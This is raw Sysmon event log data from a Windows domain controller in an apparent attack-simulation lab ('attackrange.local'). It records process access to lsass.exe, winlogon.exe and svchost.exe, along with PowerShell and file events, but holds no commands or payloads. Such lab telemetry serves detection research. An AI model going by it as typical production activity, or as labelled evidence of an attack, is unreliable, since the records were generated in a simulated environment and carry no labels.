16:54:43.475{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1600-00000000AD01}1540C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243106Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.475{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1500-00000000AD01}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243105Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.475{05ADC7E1-6DD3-603E-DFAA-00000000AD01}1117211424C:\Windows\system32\conhost.exe{05ADC7E1-6DD3-603E-DEAA-00000000AD01}9656C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243104Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.475{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1400-00000000AD01}1316C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243103Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.475{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1300-00000000AD01}1256C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243102Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.475{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1200-00000000AD01}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243101Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.475{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1100-00000000AD01}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243100Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.474{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1000-00000000AD01}1144C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243099Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.474{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0F00-00000000AD01}1100C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243098Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.473{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0E00-00000000AD01}1076C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002243097Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.473{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2B8444C47AE5C778E86D0F3780F329F0,SHA256=CC20D79DD3D91015A3F4C815B9309004D13F8E4D4AA1C0B61D91E4E167DBB448,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002243096Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.473{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0D00-00000000AD01}620C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243095Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.472{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0C00-00000000AD01}588C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243094Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.471{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243093Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.470{05ADC7E1-229F-6039-1600-00000000AD01}15401672C:\Windows\system32\svchost.exe{05ADC7E1-6DD3-603E-DAAA-00000000AD01}13472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243092Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.470{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6DD3-603E-DAAA-00000000AD01}13472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243091Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.468{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0900-00000000AD01}792C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002243090Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.451{05ADC7E1-6DD3-603E-D8AA-00000000AD01}14280ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002243089Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.451{05ADC7E1-29F0-6039-C005-00000000AD01}49442420C:\Windows\system32\csrss.exe{05ADC7E1-6DD3-603E-DFAA-00000000AD01}11172C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002243088Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.451{05ADC7E1-29F0-6039-C005-00000000AD01}49441064C:\Windows\system32\csrss.exe{05ADC7E1-6DD3-603E-DEAA-00000000AD01}9656C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 11241100x80000000000000002243087Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.451{05ADC7E1-6DD3-603E-DCAA-00000000AD01}11576C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_j4entlpu.2xp.ps12021-03-02 16:54:43.451 10341000x80000000000000002243086Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.451{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243085Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.451{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243084Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.451{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243083Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.451{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243082Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.451{05ADC7E1-229D-6039-0500-00000000AD01}636652C:\Windows\system32\csrss.exe{05ADC7E1-6DD3-603E-DEAA-00000000AD01}9656C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002243081Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 